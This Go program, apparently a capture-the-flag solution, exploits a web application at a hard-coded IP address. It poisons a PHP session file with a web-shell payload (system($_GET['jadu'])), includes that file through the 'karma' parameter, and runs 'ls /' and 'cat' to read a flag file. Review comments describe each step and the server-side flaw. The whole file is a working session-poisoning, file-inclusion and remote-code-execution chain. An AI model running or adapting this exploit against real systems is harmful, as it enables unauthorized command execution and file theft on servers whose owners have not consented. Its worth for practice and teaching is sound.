get flag script in go
package main
import (
	"bytes"
	"fmt"
	"net/http"
	neturl "net/url"
	"regexp"
	"strings"
	"time"
)
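// Package-level settings shared by every request this script makes.
var (
	// client is the one HTTP client reused for all requests. The zero-value
	// http.Client has no timeout, so an unresponsive host would block the
	// script forever; a bounded timeout makes each request fail cleanly.
	client = &http.Client{Timeout: 15 * time.Second}

	// url is the hard-coded base address of the web application being queried.
	url = "http://44.200.237.73/"

	// payload is a pre-encoded query string. Decoded, it sets the "karma"
	// parameter to a one-line PHP snippet that hands the "jadu" request
	// parameter to system().
	// NOTE(review): the script appears to rely on the application persisting
	// this value server-side; that cannot be confirmed from this file.
	payload = "?karma=%3C%3Fphp+system%28%24_GET%5B%27jadu%27%5D%29%3B+%3F%3E"

	// cmdRegex extracts a FLAG{...} token from response text. ".*" is greedy
	// and does not cross newlines, so a match extends to the last "}" on the
	// line where "FLAG{" was found.
	cmdRegex = regexp.MustCompile("FLAG{.*}")
)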
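// sendPayload performs one GET request for url+payload and discards the
// response. It returns the transport error from the request, or nil once the
// request has completed.
func sendPayload() error {
	resp, err := client.Get(url + payload)
	if err != nil {
		return err
	}
	// The body is not read, but it still has to be closed: an unclosed body
	// leaks the underlying connection for the lifetime of the process.
	defer resp.Body.Close()
	return nil
}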
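// executeCommand sends a GET request to url with the "karma" parameter set to
// "/tmp/sess_<cookie>" and, when cmd is non-empty, the "jadu" parameter set to
// cmd. It returns the full response body as a string.
//
// An error is returned if the request cannot be built or sent, or if the body
// cannot be read completely; in that case the returned string is empty.
//
// NOTE(review): the "karma" value is a filesystem path derived from the session
// cookie, so the script evidently depends on the server treating that
// parameter as a file to load. Server-side, a request parameter should never
// reach a file-include or file-read call without validation.
func executeCommand(cookie string, cmd string) (string, error) {
	// neturl is the net/url package under an alias: this file also declares a
	// package-level string named url, and the two names cannot coexist.
	query := neturl.Values{}
	query.Add("karma", "/tmp/sess_"+cookie)
	if cmd != "" {
		query.Add("jadu", cmd)
	}

	// Encode escapes both values, so cookie and cmd cannot break out of the
	// query string.
	req, err := http.NewRequest(http.MethodGet, url+"?"+query.Encode(), nil)
	if err != nil {
		return "", err
	}

	resp, err := client.Do(req)
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()

	// A failed or truncated read is reported instead of silently returning a
	// partial body that later parsing would misinterpret.
	var body bytes.Buffer
	if _, err := body.ReadFrom(resp.Body); err != nil {
		return "", err
	}
	return body.String(), nil
}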
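// main drives the request sequence: it fetches the index page to obtain a
// session cookie, alternates sendPayload and executeCommand calls to list "/"
// and then read the file whose name matches cmdRegex, and prints the flag found
// in that file's output. Any failure is printed and ends the run.
func main() {
	// Initial request: only the cookie set by the server is used.
	res, err := client.Get(url)
	if err != nil {
		fmt.Println(err)
		return
	}
	defer res.Body.Close()

	// Guard the index: a response without Set-Cookie would otherwise panic.
	cookies := res.Cookies()
	if len(cookies) == 0 {
		fmt.Println("no cookie in the initial response")
		return
	}
	cookie := cookies[0]

	// First call carries no command; its output is ignored.
	if _, err = executeCommand(cookie.Value, ""); err != nil {
		fmt.Println(err)
		return
	}

	if err = sendPayload(); err != nil {
		fmt.Println(err)
		return
	}

	// List the filesystem root and look for an entry shaped like FLAG{...}.
	response, err := executeCommand(cookie.Value, "ls /")
	if err != nil {
		fmt.Println(err)
		return
	}
	file := cmdRegex.FindString(response)
	if file == "" {
		fmt.Println("Oops something wrong no output found!!")
		return
	}

	// The payload request is repeated before the second command.
	if err = sendPayload(); err != nil {
		fmt.Println(err)
		return
	}

	response, err = executeCommand(cookie.Value, fmt.Sprintf("cat /%s", file))
	if err != nil {
		fmt.Println(err)
		return
	}

	// The wanted text is the segment between the first and second ':' of the
	// response. Check that a ':' exists instead of indexing blindly, which
	// would panic on an unexpected response.
	parts := strings.SplitN(response, ":", 3)
	if len(parts) < 2 {
		fmt.Println("unexpected response format: no ':' separator found")
		return
	}
	msg := parts[1]
	fmt.Println(msg)

	flag := cmdRegex.FindString(msg)
	fmt.Println("\nFlag: " + flag)
}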